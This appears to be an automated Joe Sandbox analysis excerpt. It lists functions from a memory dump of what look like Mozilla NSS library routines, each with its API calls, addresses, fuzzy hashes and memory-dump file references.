Instruction ID: 2fb25e2cffd73279b25cdbc6f2df729d30c7a66d22db131576a7137ae5b8125f
Opcode Fuzzy Hash: a791433f80e56962a82a931d561db6839e3f4e19953f5a7afed2421f77027847
Instruction Fuzzy Hash: A2519FB47083409FC324CF15C484B6AB7E1FF98348F04899EE8998BB62D375E845CB46

Function 6C804FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6C6E85D2,00000000,?,?), ref: 6C804FFD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C80500C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8050C8
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8050D6

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction ID: 1917884e691f85356ef0cc1d4a7e5c946bffef994a4e59c2fa4162e64e2d4fe6
Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction Fuzzy Hash: D34186B2A003158BDB18CF18DCD179AB7E1BF44318B1D4A6DD84AC7B02E375E891CB95

Function 6C85A860 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 6C85A690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6C85A662), ref: 6C85A69E
Part of subcall function 6C85A690: PR_NewCondVar.NSS3(?), ref: 6C85A6B4

PR_IntervalNow.NSS3 ref: 6C85A8C6
EnterCriticalSection.KERNEL32(?), ref: 6C85A8EB
_PR_MD_UNLOCK.NSS3(?), ref: 6C85A944
PR_SetPollableEvent.NSS3(?), ref: 6C85A94F

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CondCriticalEnterEventIntervalPollableSectioncalloc
String ID:
API String ID: 811965633-0
Opcode ID: 5053407711451f8dbb26b7153fc9496a855bac8e1682f5d2b8ff2b509e380066
Instruction ID: 656aa45519398a0ee5d0fc9c525137c1fe2aac98a03250323cfe8187808d508c
Opcode Fuzzy Hash: 5053407711451f8dbb26b7153fc9496a855bac8e1682f5d2b8ff2b509e380066
Instruction Fuzzy Hash: A3417EB4A016128FC764CF19C6C09A6F7F1FF483147558929D459CBB11E371F850CBA0

Function 6C7B2C80 Relevance: 6.1, APIs: 4, Instructions: 105COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,?,6C7B1289,?), ref: 6C7B2D72

Part of subcall function 6C7B3390: PORT_ZAlloc_Util.NSS3(00000000,-0000002C,?,6C7B2CA7,E80C76FF,?,6C7B1289,?), ref: 6C7B33E9
Part of subcall function 6C7B3390: PORT_ZAlloc_Util.NSS3(0000001C), ref: 6C7B342E

PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C7B1289,?), ref: 6C7B2D61

Part of subcall function 6C7B0B00: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7B0B21
Part of subcall function 6C7B0B00: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7B0B64

PR_SetError.NSS3(FFFFE02D,00000000,?,?,?,?,6C7B1289,?), ref: 6C7B2D88
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C7B1289,?), ref: 6C7B2DAF

Part of subcall function 6C76B8F0: PR_CallOnceWithArg.NSS3(6C8A2178,6C76BCF0,?), ref: 6C76B915
Part of subcall function 6C76B8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000001,?), ref: 6C76B933
Part of subcall function 6C76B8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,?), ref: 6C76B9C8
Part of subcall function 6C76B8F0: SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6C76B9E1

Part of subcall function 6C7B0A50: SECOID_GetAlgorithmTag_Util.NSS3(6C7B2A90,E8571076,?,6C7B2A7C,6C7B21F1,?,?,?,00000000,00000000,?,?,6C7B21DD,00000000), ref: 6C7B0A66

Part of subcall function 6C7B3310: SECOID_GetAlgorithmTag_Util.NSS3(?,00000000,FFFFFFFF,?,6C7B2D1E,?,?,?,?,00000000,?,?,?,?,?,6C7B1289), ref: 6C7B3348

Part of subcall function 6C7B06F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6C7B2E70,00000000), ref: 6C7B0701

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$AlgorithmAlloc_ErrorK11_Tag_$Item_Tokens$AllocCallFreeOnceWithZfree
String ID:
API String ID: 2288138528-0
Opcode ID: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction ID: 09eeffbc264a6161bec40f07073a713c0c891495cfda9590fb55d38bbeb78fe7
Opcode Fuzzy Hash: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction Fuzzy Hash: C031EAB69012016BDB009E64EE4DE9A3769BF4532DF140130ED15ABB91FB31E958C7A2

Function 6C746C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C746C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C746CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C746CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C868FE0), ref: 6C746CFE

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: 933ae7fccd838a4e9694f8b59c4725c30051f6ff22aa8185cf3bc2aa390d551d
Instruction ID: a58f7c67b545c2428536bf4c8de47e4c3b1403ca0a89281ec381bf99fdcbd84a
Opcode Fuzzy Hash: 933ae7fccd838a4e9694f8b59c4725c30051f6ff22aa8185cf3bc2aa390d551d
Instruction Fuzzy Hash: AD318FB5A002169FEB08CF65C995ABFBBF5EF45348B10843DD905E7700EB71AA05CBA0

Function 6C7B6DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6C7B6E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7B6E57

Part of subcall function 6C7EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7EC2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6C7B6E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6C7B6EAA

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID:
API String ID: 3163584228-0
Opcode ID: 26d427d457c1344c0a662231976ca414538428f718505378398995aa78d39506
Instruction ID: e62e7fb310f728dc4da05280f9398ce81cdac83e03bfe326cddf9a259486f7d2
Opcode Fuzzy Hash: 26d427d457c1344c0a662231976ca414538428f718505378398995aa78d39506
Instruction Fuzzy Hash: 0A31A272610612EFDB1C5F34DE08396B7A8BB0531AF14063CE699F6A81EB307654CF91

Function 6C7B2880 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

NSS_CMSEncoder_Finish.NSS3(?), ref: 6C7B2896
NSS_CMSEncoder_Finish.NSS3(?), ref: 6C7B2932
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7B294C
free.MOZGLUE(?), ref: 6C7B2955

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Encoder_Finish$Arena_FreeUtilfree
String ID:
API String ID: 508480814-0
Opcode ID: 0023678ff75768e820e0e5f46e8c0ece07f3d46e590b3220cacfcb2afcc642a8
Instruction ID: 1557caa88db24fabb6932cd388b4c2c5e1000f7720fa9e41e91509a16a06f8be
Opcode Fuzzy Hash: 0023678ff75768e820e0e5f46e8c0ece07f3d46e590b3220cacfcb2afcc642a8
Instruction Fuzzy Hash: 7721B8B56016009BE7208F2AEE0DF477BE5AF88358F154538E45DE7B61FB32E4188751

Function 6C784FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C78B60F,00000000), ref: 6C785003
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C78B60F,00000000), ref: 6C78501C
PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C78B60F,00000000), ref: 6C78504B
free.MOZGLUE(?,00000000,00000000,00000000,?,6C78B60F,00000000), ref: 6C785064

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 1112172411-0
Opcode ID: 21ef956a5498758681deac4562c820c572734da3c72fd7316bd0ced373e52635
Instruction ID: b20c2db501d69768efef5f8fc3194dcb0985ece7253d40df14b9f11dc4c7c359
Opcode Fuzzy Hash: 21ef956a5498758681deac4562c820c572734da3c72fd7316bd0ced373e52635
Instruction Fuzzy Hash: D83116B4A056068FDB40EF78D58866ABBF4FF48308B158539D95AD7701E731E890CBD1

Function 6C7B2DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C7B2E08

Part of subcall function 6C7A14C0: TlsGetValue.KERNEL32 ref: 6C7A14E0
Part of subcall function 6C7A14C0: EnterCriticalSection.KERNEL32 ref: 6C7A14F5
Part of subcall function 6C7A14C0: PR_Unlock.NSS3 ref: 6C7A150D

PORT_NewArena_Util.NSS3(00000400), ref: 6C7B2E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C7B2E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7B2E95

Part of subcall function 6C7A1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C7488A4,00000000,00000000), ref: 6C7A1228
Part of subcall function 6C7A1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C7A1238
Part of subcall function 6C7A1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C7488A4,00000000,00000000), ref: 6C7A124B
Part of subcall function 6C7A1200: PR_CallOnce.NSS3(6C8A2AA4,6C7A12D0,00000000,00000000,00000000,?,6C7488A4,00000000,00000000), ref: 6C7A125D
Part of subcall function 6C7A1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C7A126F
Part of subcall function 6C7A1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C7A1280
Part of subcall function 6C7A1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C7A128E
Part of subcall function 6C7A1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C7A129A
Part of subcall function 6C7A1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C7A12A1

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: a6b0e0d6281080cfab161e0e8e7994bcde9f0a313b1422f132cf80ec0044fd15
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: C621C2B5E013458BE700CF559E4CBAA3768AB9130CF210379FD186B652F7B1E698C292

Function 6C7469B0 Relevance: 6.1, APIs: 4, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(6C746AB7,0000000C,00000001,00000000,?,?,6C746AB7,?,00000000,?), ref: 6C7469CE

Part of subcall function 6C7A10C0: TlsGetValue.KERNEL32(?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A10F3
Part of subcall function 6C7A10C0: EnterCriticalSection.KERNEL32(?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A110C
Part of subcall function 6C7A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A1141
Part of subcall function 6C7A10C0: PR_Unlock.NSS3(?,?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A1182
Part of subcall function 6C7A10C0: TlsGetValue.KERNEL32(?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A119C

SEC_ASN1EncodeItem_Util.NSS3(6C746AB7,0000001C,00000004,?,00000001,00000000), ref: 6C746A06
SEC_ASN1EncodeItem_Util.NSS3(6C746AB7,?,00000000,?,00000001,00000000,?,?,6C746AB7,?,00000000,?), ref: 6C746A2D
PR_SetError.NSS3(FFFFE005,00000000,00000001,00000000,?,?,6C746AB7,?,00000000,?), ref: 6C746A42

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$ArenaEncodeItem_Value$Alloc_AllocateCriticalEnterErrorSectionUnlock
String ID:
API String ID: 4031546487-0
Opcode ID: f8faaca14c72d489265c4deaf2176c215526d2ed5dfba01eaa9296ac564622e6
Instruction ID: 41115866fa4b2eeae765d5fc2c91307b5b90284414958247e6ba576010397cb1
Opcode Fuzzy Hash: f8faaca14c72d489265c4deaf2176c215526d2ed5dfba01eaa9296ac564622e6
Instruction Fuzzy Hash: 73119DB1780A01AFE7108F6ADE84B5677ACFB0435CF14C639EA19C7A41E731EA54C6A0

Function 6C79ECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C79F0AD,6C79F150,?,6C79F150,?,?,?), ref: 6C79ECBA

Part of subcall function 6C7A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7487ED,00000800,6C73EF74,00000000), ref: 6C7A1000
Part of subcall function 6C7A0FF0: PR_NewLock.NSS3(?,00000800,6C73EF74,00000000), ref: 6C7A1016
Part of subcall function 6C7A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7487ED,00000008,?,00000800,6C73EF74,00000000), ref: 6C7A102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C79ECD1

Part of subcall function 6C7A10C0: TlsGetValue.KERNEL32(?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A10F3
Part of subcall function 6C7A10C0: EnterCriticalSection.KERNEL32(?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A110C
Part of subcall function 6C7A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A1141
Part of subcall function 6C7A10C0: PR_Unlock.NSS3(?,?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A1182
Part of subcall function 6C7A10C0: TlsGetValue.KERNEL32(?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C79ED02

Part of subcall function 6C7A10C0: PL_ArenaAllocate.NSS3(?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C79ED5A

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: 5296bd2f5551bedd3c65d0a9de419d654e1456208bdc5873b34d55daf0caa993
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: 3621A4B5A007469BE700CF25EA49B52B7E4BFA5348F15C325E81C87761EB70E594C7D0

Function 6C76C860 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON

Download Yara Rule

APIs

PK11_IsLoggedIn.NSS3(?,?), ref: 6C76C890

Part of subcall function 6C768F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C75DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C768FAF
Part of subcall function 6C768F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C75DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C768FD1
Part of subcall function 6C768F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C75DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C768FFA
Part of subcall function 6C768F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C75DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C769013
Part of subcall function 6C768F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C75DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C769042
Part of subcall function 6C768F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C75DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C76905A
Part of subcall function 6C768F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C75DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C769073
Part of subcall function 6C768F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C75DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C769111

PR_GetCurrentThread.NSS3 ref: 6C76C8B2

Part of subcall function 6C809BF0: TlsGetValue.KERNEL32(?,?,?,6C850A75), ref: 6C809C07

PK11_Authenticate.NSS3(?,00000001,?), ref: 6C76C8D0
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C76C8EB

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: K11_Value$CriticalEnterSectionUnlock$AuthenticateCurrentInternalItem_LoggedSlotThreadUtilZfree
String ID:
API String ID: 999015661-0
Opcode ID: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
Instruction ID: 5c990b4f23daf0febf448383ebfde678343d59e3ed4a0233d77fc1dd9bda399e
Opcode Fuzzy Hash: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
Instruction Fuzzy Hash: CF010C76E0121277DB1026BB6E84AFF35689F5636DF080135FC04A7F01F351881883E2

Function 6C794900 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000004,6C77C79F,?,?,6C795C4A,?), ref: 6C794950

Part of subcall function 6C798800: TlsGetValue.KERNEL32(?,6C7A085A,00000000,?,6C748369,?), ref: 6C798821
Part of subcall function 6C798800: TlsGetValue.KERNEL32(?,?,6C7A085A,00000000,?,6C748369,?), ref: 6C79883D
Part of subcall function 6C798800: EnterCriticalSection.KERNEL32(?,?,?,6C7A085A,00000000,?,6C748369,?), ref: 6C798856
Part of subcall function 6C798800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C798887
Part of subcall function 6C798800: PR_Unlock.NSS3(?,?,?,?,6C7A085A,00000000,?,6C748369,?), ref: 6C798899

TlsGetValue.KERNEL32(?,?,?), ref: 6C79496A
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C79497A
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C794989

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$CondErrorWait
String ID:
API String ID: 3904631464-0
